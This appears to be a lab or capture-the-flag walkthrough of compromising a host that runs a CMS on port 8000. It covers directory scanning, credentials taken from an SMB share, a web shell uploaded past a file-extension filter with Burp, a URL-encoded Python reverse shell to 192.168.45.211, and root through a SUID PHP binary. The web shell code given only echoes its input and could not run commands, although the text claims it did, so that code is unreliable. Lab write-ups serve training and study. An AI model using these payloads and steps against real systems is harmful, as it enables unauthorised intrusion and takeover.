Target IP: 192.168.170.76
There are five TCP ports open on the machine: SSH, HTTP, SMB, and another HTTP. I will start my enumeration with the HTTP application on both ports 80 and 8000.
Port 80: HTTP
We are presented the webpage above when we browse to this port from a web-browser. The username v1n1v131r4 is interesting. Doing a source-code scan did not show anything important.
Doing a directory search using the command gobuster dir -u http://192.168.170.76/ -w /usr/share/wordlists/dirb/big.txt -x php,html points to /assets which contains the files for this application, but it is not very helpful.
Port 8000: HTTP
The webpage above is displayed to us when we visit the port 8000 using a web-browser. Could the text daisa ahomi be a name? Navigating around the site did not show anything interesting.
However, while scanning through the source-code, I did find the version and name of the application running on this port. It is Kroken 0.22.24.
Doing a Google search leads to an unverified exploit for this application. It requires authentication before we can fire this exploit against this port.
From the directory scan above using gobuster dir -u http://192.168.170.76:8000/ -w /usr/share/wordlists/dirb/big.txt -x php,html --exclude-length 0, I got interesting results.
The /admin/ directory allows sign-in. Maybe we can find working credentials and sign-in?
Ports 139 and 445: SMB
The SMB is open. We have read access over the samba share called sambashare . This share contains two files: mailsent.txt and wordpress.bkp.zip. I downloaded both of these files on my machine. The first file sounds interesting.
The mail contains the content above. There is so much information here. We get the names and emails of the two users of HTTP applications. Could the babygirl be a password? Apparently this application running on port 8000 is owned by daisa@photographer.com, so is daisa@photographer.com:babygirl a valid credential?
And it worked. I used the credentials above to access the admin page. Looks like we have full control of the website as we are admin.
We have more information about the system as shown above. I want to exploit this machine manually, rather than using a working exploit.
Now we have access to the admin panel, it is time to exploit it.
I created a simple online PHP web shell with the code <?php echo($_GET['cmd']);?> and named it as shell.php.jpg. I tried to upload a PHP file as it is, but the application did not this. I overcame this by using BurpSuite. After pressing Import content, selecting my web shell, and pressing Import, I intercepted the POST request and made a few changes to the name of the file.
I removed the .jpg file extension inside burpsuite. Then I forwarded all the intercepted HTTP packets.
My PHP webshell got uploaded successfully. To access it, I went to http://192.168.170.76:8000/storage/originals/e0/c9/shell.php.
And the PHP webshell seems to be working fine. Time to get a reverse shell connection.
From my testing, the PHP reverse shells did not work which is why I used Python instead. And now I have a foothold on the machine.
Payload: python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.211%22%2C80%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27
Full URL with payload: http://192.168.170.76:8000/storage/originals/e0/c9/shell.php?cmd=python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%22192.168.45.211%22%2C80%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3B%20os.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bimport%20pty%3B%20pty.spawn%28%22%2Fbin%2Fbash%22%29%27
Looks like the PHP 7.2 binary has SUID bit set. We can use this to gain root privileges.
And now we are root!
The local.txt flag is inside daisa's home directory.
The proof.txt flag once I used the php binary to elevate privileges to root.